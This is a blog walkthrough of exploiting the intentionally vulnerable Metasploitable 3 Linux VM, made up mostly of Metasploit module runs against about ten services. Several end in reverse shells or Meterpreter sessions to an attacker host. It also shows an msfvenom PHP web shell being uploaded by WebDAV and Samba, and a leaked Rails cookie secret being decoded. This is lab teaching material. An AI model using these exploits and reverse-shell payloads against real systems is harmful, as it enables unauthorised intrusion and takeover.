Metasploitable 3 (Linux): An Exploitation Guide

The Metasploitable virtual machine is an intentionally vulnerable image designed for testing security tools and demonstrating common vulnerabilities. Version 3 of this virtual machine is available in both Ubuntu and Windows forms. They can be set up using Vagrant and are available on GitHub and ship with even more vulnerabilities than Metasploitable 1 and 2. The virtual machines are compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the “private network” configuration in Vagrant (VirtualBox users may need to change this to NAT Network), and the images should never be exposed to a hostile network.

This blog post will focus on the Linux version of Metasploitable 3.

Configuration details for the virtual machine along with all users’ credentials can be found on the GitHub wiki page for Metasploitable 3.

For a comprehensive walkthrough on versions 1 and 2 of Metasploitable, you can check out my previous blog posts here and here.

nmap Scan

A preliminary nmap scan reveals a few services.

kali@kali:~$ sudo nmap -sV -O 10.0.2.15 -p0-65535
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 20:33 EDT
Nmap scan report for 10.0.2.15
Host is up (0.00020s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp CUPS 1.7
3000/tcp closed ppp
3306/tcp open mysql MySQL (unauthorized)
3500/tcp open http WEBrick httpd 1.3.1 (Ruby 2.3.7 (2018-03-28))
6697/tcp open irc UnrealIRCd
8181/tcp open http WEBrick httpd 1.3.1 (Ruby 2.3.7 (2018-03-28))
MAC Address: 08:00:27:48:64:BF (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: 127.0.1.1, UBUNTU, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.78 seconds

ProFTPD

The ProFTPD service running on the system has a remote code execution vulnerability which can be exploited using the ProFTPD 1.3.5 Mod_Copy Command Execution module.

msf5 > use exploit/unix/ftp/proftpd_modcopy_exec
msf5 exploit(unix/ftp/proftpd_modcopy_exec) > show options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www/html/   yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   ProFTPD 1.3.5
msf5 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] 10.0.2.15:80 - 10.0.2.15:21 - Connected to FTP server
[*] 10.0.2.15:80 - 10.0.2.15:21 - Sending copy commands to FTP server
[*] 10.0.2.15:80 - Executing PHP payload /VQVH3.php
[*] Command shell session 2 opened (10.0.2.4:4444 -> 10.0.2.15:36318) at 2020-04-11 22:34:17 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Apache HTTP Server

The Apache web application running on the system has a remote code execution vulnerability which can be exploited using the Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) module.

msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   CMD_MAX_LENGTH  2048                     yes       CMD max line length
   CVE             CVE-2014-6271            yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent               yes       HTTP header to use
   METHOD          GET                      yes       HTTP method to use
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.0.2.15                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin                     yes       Target PATH for binaries used by the CmdStager
   RPORT           80                       yes       The target port (TCP)
   SRVHOST         0.0.0.0                  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080                     yes       The local port to listen on.
   SSL             false                    no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/hello_world.sh  yes       Path to CGI script
   TIMEOUT         5                        yes       HTTP read response timeout (seconds)
   URIPATH                                  no        The URI to use for this exploit (default is random)
   VHOST                                    no        HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Linux x86
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.0.2.15
[*] Meterpreter session 5 opened (10.0.2.4:4444 -> 10.0.2.15:43025) at 2020-04-16 18:45:22 -0400
meterpreter > getuid
Server username: no-user @ metasploitable3-ub1404 (uid=33, gid=33, euid=33, egid=33)

The Apache web servers also runs WebDAV allowing unauthenticated file uploads to the /uploads/ directory on the web server. This could be used to get a shell by uploading a malicious PHP file.

First step would be to generate a web shell.

kali@kali:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=4444 > ~/backdoor.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1109 bytes

Next, upload it through Apache WebDAV.

kali@kali:~$ curl -X PUT -d @/home/kali/backdoor.php 10.0.2.15/uploads/backdoor.php

And trigger it by requesting the file through the webserver. Make sure to have a handler running to catch the shell!

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
<send curl command at this time>
[*] Sending stage (38288 bytes) to 10.0.2.15
[*] Meterpreter session 7 opened (10.0.2.4:4444 -> 10.0.2.15:43129) at 2020-04-16 20:26:01 -0400
meterpreter > getuid
Server username: www-data (33)
kali@kali:~$ curl 10.0.2.15/uploads/backdoor.php

Drupal

The Drupal web application running on the system has a remote code execution vulnerability which can be exploited using the Drupal HTTP Parameter Key/Value SQL Injection (Drupageddon) module.

msf5 > use exploit/multi/http/drupal_drupageddon
msf5 exploit(multi/http/drupal_drupageddon) > show options
Module options (exploit/multi/http/drupal_drupageddon):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.2.15/32     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /drupal/         yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)
msf5 exploit(multi/http/drupal_drupageddon) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Sending stage (38288 bytes) to 10.0.2.15
[*] Meterpreter session 3 opened (10.0.2.4:4444 -> 10.0.2.15:36396) at 2020-04-11 23:18:44 -0400
meterpreter > getuid
Server username: www-data (33)

phpMyAdmin

The phpMyAdmin web application running on the system has a remote code execution vulnerability which can be exploited using the phpMyAdmin Authenticated Remote Code Execution via preg_replace() module.

msf5 > use exploit/multi/http/phpmyadmin_preg_replace
msf5 exploit(multi/http/phpmyadmin_preg_replace) > show options
Module options (exploit/multi/http/phpmyadmin_preg_replace):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   sploitme         no        Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /phpmyadmin/     yes       Base phpMyAdmin directory path
   USERNAME   root             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(multi/http/phpmyadmin_preg_replace) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] phpMyAdmin version: 3.5.8
[*] The target appears to be vulnerable.
[*] Grabbing CSRF token...
[+] Retrieved token
[*] Authenticating...
[+] Authentication successful
[*] Sending stage (38288 bytes) to 10.0.2.15
[*] Meterpreter session 5 opened (10.0.2.4:4444 -> 10.0.2.15:36448) at 2020-04-11 23:43:33 -0400
meterpreter > getuid
Server username: www-data (33)

Ruby on Rails

The Ruby on Rails web application running on the system at port 3500 has a remote code execution vulnerability which can be exploited using the Ruby on Rails ActionPack Inline ERB Code Execution module.

msf5 > use exploit/multi/http/rails_actionpack_inline_exec
msf5 exploit(multi/http/rails_actionpack_inline_exec) > show options
Module options (exploit/multi/http/rails_actionpack_inline_exec):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        3500             yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETPARAM  os               yes       The target parameter to inject with inline code
   TARGETURI    /readme          yes       The path to a vulnerable Ruby on Rails application
   VHOST                         no        HTTP server virtual host
Payload options (ruby/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(multi/http/rails_actionpack_inline_exec) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Sending inline code to parameter: os
[*] Command shell session 7 opened (10.0.2.4:4444 -> 10.0.2.15:37195) at 2020-04-12 12:40:00 -0400
id
uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker)

The Ruby on Rails web application running on the system at port 8181 has a remote code execution vulnerability which can be exploited using the Ruby on Rails Known Secret Session Cookie Remote Code Execution module.

This exploit does require knowledge of the secret used to sign the session cookie. However, the web server conveniently sends us the secret in the Set-Cookie header.

kali@kali:~$ curl -v 10.0.2.15:8181 | grep 'Set-Cookie'
*   Trying 10.0.2.15:8181...
* TCP_NODELAY set
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Connected to 10.0.2.15 (10.0.2.15) port 8181 (#0)
> GET / HTTP/1.1
> Host: 10.0.2.15:8181
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html;charset=utf-8
< Content-Length: 132
< X-Xss-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Server: WEBrick/1.3.1 (Ruby/2.3.7/2018-03-28)
< Date: Wed, 15 Apr 2020 23:30:23 GMT
< Connection: Keep-Alive
< Set-Cookie: _metasploitable=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRTlmNTZiNjA1MDM3M2VjYWZlZDBi%0AMTFlMDNkYTdiYWY4YjRiOGQ5NDAzY2ViNTA0MzUxNzYzNzQwYmIyZGM1MDkG%0AOwBGSSIUX21ldGFzcGxvaXRhYmxlBjsAVEkiVFNoaGhoaCwgZG9uJ3QgdGVs%0AbCBhbnlib2R5IHRoaXMgY29va2llIHNlY3JldDogYTdhZWJjMjg3YmJhMGVl%0ANGU2NGY5NDc0MTVhOTRlNWYGOwBU%0A--fa2c7c622c1e4d24497193bac55e9bbbc2e1fe39; path=/; expires=Thu, 16 Apr 2020 00:00:23 -0000; HttpOnly
<
{ [132 bytes data]
100   132  100   132    0     0  66000      0 --:--:-- --:--:-- --:--:-- 66000
* Connection #0 to host 10.0.2.15 left intact

The cookie can be decoded to fetch the signing secret by URL decoding it and then base64 decoding it after separating the signature part (the stuff after the –).

kali@kali:~$ python -c "import urllib as ul; print(ul.unquote_plus('BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRTlmNTZiNjA1MDM3M2VjYWZlZDBi%0AMTFlMDNkYTdiYWY4YjRiOGQ5NDAzY2ViNTA0MzUxNzYzNzQwYmIyZGM1MDkG%0AOwBGSSIUX21ldGFzcGxvaXRhYmxlBjsAVEkiVFNoaGhoaCwgZG9uJ3QgdGVs%0AbCBhbnlib2R5IHRoaXMgY29va2llIHNlY3JldDogYTdhZWJjMjg3YmJhMGVl%0ANGU2NGY5NDc0MTVhOTRlNWYGOwBU%0A--fa2c7c622c1e4d24497193bac55e9bbbc2e1fe39').split('--')[0]);" | base64 -d
{I"session_id:ETI"E9f56b6050373ecafed0b11e03da7baf8b4b8d9403ceb504351763740bb2dc509;FI"_metasploitable;TI"TShhhhh, don't tell anybody this cookie secret: a7aebc287bba0ee4e64f947415a94e5f;T

Now that we have the secret a7aebc287bba0ee4e64f947415a94e5f, we can use it to get our shell!

msf5 > use exploit/multi/http/rails_actionpack_inline_exec
msf5 exploit(multi/http/rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
   Name             Current Setting                   Required  Description
   ----             ---------------                   --------  -----------
   COOKIE_NAME      _metasploitable                   no        The name of the session cookie
   DIGEST_NAME      SHA1                              yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                               yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                 yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOSTS           10.0.2.15                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            8181                              yes       The target port (TCP)
   SALTENC          encrypted cookie                  yes       The encrypted cookie salt
   SALTSIG          signed encrypted cookie           yes       The signed encrypted cookie salt
   SECRET           a7aebc287bba0ee4e64f947415a94e5f  yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   SSL              false                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /                                 yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                              no        Only send the payload if the session cookie is validated
   VHOST                                              no        HTTP server virtual host
Payload options (ruby/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(multi/http/rails_secret_deserialization) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Checking for cookie _metasploitable
[*] Found cookie, now checking for proper SECRET
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _metasploitable
[*] Command shell session 3 opened (10.0.2.4:4444 -> 10.0.2.15:36254) at 2020-04-15 19:26:00 -0400
id
uid=0(root) gid=0(root) groups=0(root)

CUPS

The CUPS application running on the system has a remote code execution vulnerability which can be exploited using the CUPS Filter Bash Environment Variable Code Injection (Shellshock) module.

Note that there is currently a configuration issue due to which this exploit does not work on a default configuration. You will need to add the vagrant user to the lpadmin group to get this to work by running the below command as root on the Metasploitable box first.

root@metasploitable3-ub1404:/home/vagrant# usermod -a -G lpadmin vagrant
msf5 > use exploit/multi/http/cups_bash_env_exec
msf5 exploit(multi/http/cups_bash_env_exec) > show options
Module options (exploit/multi/http/cups_bash_env_exec):
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CVE           CVE-2014-6271    yes       CVE to exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HttpPassword  vagrant          yes       CUPS user password
   HttpUsername  vagrant          yes       CUPS username
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH         /bin             yes       Target PATH for binaries
   RPORT         631              yes       The target port (TCP)
   SSL           true             yes       Use SSL
   VHOST                          no        HTTP server virtual host
Payload options (cmd/unix/reverse_ruby_ssl):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf5 exploit(multi/http/cups_bash_env_exec) > run
[*] Started reverse SSL handler on 10.0.2.4:4444
[+] Added printer successfully
[+] Deleted printer 'CNtAM2hsz6XXg' successfully
[*] Command shell session 6 opened (10.0.2.4:4444 -> 10.0.2.15:43043) at 2020-04-16 18:55:15 -0400
id
uid=7(lp) gid=7(lp) groups=7(lp)

Unreal IRCd

The Unreal IRCd application running on the system has a remote code execution vulnerability which can be exploited using the UnrealIRCD 3.2.8.1 Backdoor Command Execution module.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6697             yes       The target port (TCP)
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.4:4444
[*] 10.0.2.15:6697 - Connected to 10.0.2.15:6697...
    :irc.TestIRC.net NOTICE AUTH :*** Looking up your hostname...
[*] 10.0.2.15:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo WLPTgOfxOWQqTkwI;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "WLPTgOfxOWQqTkwI\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 9 opened (10.0.2.4:4444 -> 10.0.2.15:37212) at 2020-04-12 12:48:26 -0400
id
uid=1121(boba_fett) gid=100(users) groups=100(users),999(docker)

Apache Continuum

The Apache Continuum application running on the system has a remote code execution vulnerability which can be exploited using the Apache Continuum Arbitrary Command Execution module.

Note that this vulnerability is currently not exploitable due a configuration issue in the iptables rules. This can be resolved by updating the iptables rules as shown below.

root@metasploitable3-ub1404:/home/vagrant# iptables-save > /tmp/ipt.txt
root@metasploitable3-ub1404:/home/vagrant# cat /tmp/ipt.txt
# Generated by iptables-save v1.4.21 on Thu Apr 16 23:45:56 2020
*nat
:PREROUTING ACCEPT [6:360]
:INPUT ACCEPT [6:360]
:OUTPUT ACCEPT [196:29690]
:POSTROUTING ACCEPT [196:29690]
:DOCKER - [0:0]
-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER
-A OUTPUT ! -d 127.0.0.0/8 -m addrtype --dst-type LOCAL -j DOCKER
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE
-A DOCKER -i docker0 -j RETURN
COMMIT
# Completed on Thu Apr 16 23:45:56 2020
# Generated by iptables-save v1.4.21 on Thu Apr 16 23:45:56 2020
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [19483:4986198]
:DOCKER - [0:0]
:DOCKER-ISOLATION-STAGE-1 - [0:0]
:DOCKER-ISOLATION-STAGE-2 - [0:0]
:DOCKER-USER - [0:0]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 631 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6697 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3500 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8181 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 445 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 32000 -j ACCEPT (Add this line)
-A INPUT -p tcp -m tcp --dport 8080 -j ACCEPT (Add this line also))
-A INPUT -j DROP
-A FORWARD -j DOCKER-USER
-A FORWARD -j DOCKER-ISOLATION-STAGE-1
-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -o docker0 -j DOCKER
-A FORWARD -i docker0 ! -o docker0 -j ACCEPT
-A FORWARD -i docker0 -o docker0 -j ACCEPT
-A DOCKER-ISOLATION-STAGE-1 -i docker0 ! -o docker0 -j DOCKER-ISOLATION-STAGE-2
-A DOCKER-ISOLATION-STAGE-1 -j RETURN
-A DOCKER-ISOLATION-STAGE-2 -o docker0 -j DROP
-A DOCKER-ISOLATION-STAGE-2 -j RETURN
-A DOCKER-USER -j RETURN
COMMIT
# Completed on Thu Apr 16 23:45:56 2020
root@metasploitable3-ub1404:/home/vagrant# iptables-restore < /tmp/ipt.txt
msf5 > use exploit/linux/http/apache_continuum_cmd_exec
msf5 exploit(linux/http/apache_continuum_cmd_exec) > show options
Module options (exploit/linux/http/apache_continuum_cmd_exec):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.0.2.15        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8080             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Apache Continuum <= 1.4.2
msf5 exploit(linux/http/apache_continuum_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Injecting CmdStager payload...
[*] Sending stage (985320 bytes) to 10.0.2.15
[*] Meterpreter session 10 opened (10.0.2.4:4444 -> 10.0.2.15:49126) at 2020-04-12 23:47:16 -0400
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Docker Daemon Local Privilege Escalation

The Docker daemon running on the system exposes an unprotected TCP sockets that allows a local privilege escalation vulnerability which can be exploited using the Docker Daemon – Unprotected TCP Socket Exploit module.

This exploit requires a session running as a user in the docker group. The Metasploitable 3 configuration adds the users boba_fett, jabba_hutt, greedo and chewbacca to the docker group.

The exploit for Unreal IRCd mentioned above would be a good candidate for obtaining the session as Unreal IRCd is running as the boba_fett user. This exploit would require that the Unreal IRCd exploit was used with the cmd/unix/reverse_perl payload.

msf5 > use exploit/linux/local/docker_daemon_privilege_escalation
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > show options
Module options (exploit/linux/local/docker_daemon_privilege_escalation):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  13               yes       The session to run this module on.
Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 10.0.2.4:4444
[+] Docker daemon is accessible.
[*] Writing payload executable to '/tmp/nvqcVNIodyb'
[*] Executing script to create and run docker container
[*] Waiting 60s for payload
[*] Sending stage (985320 bytes) to 10.0.2.15
[*] Meterpreter session 14 opened (10.0.2.4:4444 -> 10.0.2.15:49185) at 2020-04-13 00:46:33 -0400
meterpreter > getuid
Server username: uid=1121, gid=100, euid=0, egid=100

Samba

The Samba application hosts a share accessible by the chewbaccauser. The share just happens to be mapped to the /var/www/html/ location on the Metasploitable 3 machine, allowing you to upload a web shell to gain access to the system.

First step would be to generate a web shell.

kali@kali:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=4444 > ~/backdoor.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1109 bytes

Next, upload it through the samba share.

msf5 > use auxiliary/admin/smb/upload_file
msf5 auxiliary(admin/smb/upload_file) > show options
Module options (auxiliary/admin/smb/upload_file):
   Name         Current Setting          Required  Description
   ----         ---------------          --------  -----------
   FILE_LPATHS                           no        A file containing a list of local files to utilize
   FILE_RPATHS                           no        A file containing a list remote files relative to the share to operate on
   LPATH        /home/kali/backdoor.php  no        The path of the local file to utilize
   RHOSTS       10.0.2.15                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH        backdoor.php             no        The name of the remote file relative to the share to operate on
   RPORT        445                      yes       The SMB service port (TCP)
   SMBDomain    .                        no        The Windows domain to use for authentication
   SMBPass      rwaaaaawr5               no        The password for the specified username
   SMBSHARE     public                   yes       The name of a writeable share on the server
   SMBUser      chewbacca                no        The username to authenticate as
   THREADS      1                        yes       The number of concurrent threads (max one per host)
msf5 auxiliary(admin/smb/upload_file) > run
[+] 10.0.2.15:445         - /home/kali/backdoor.php uploaded to backdoor.php
[*] 10.0.2.15:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And trigger it by requesting the file through the webserver. Make sure to have a handler running to catch the shell!

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
<send curl command at this time>
[*] Sending stage (38288 bytes) to 10.0.2.15
[*] Meterpreter session 4 opened (10.0.2.4:4444 -> 10.0.2.15:36312) at 2020-04-15 20:28:46 -0400
meterpreter > getuid
Server username: www-data (33)
kali@kali:~$ curl 10.0.2.15/backdoor.php

Thank you for reading!

Please do reach out for feedback!

Leave a Reply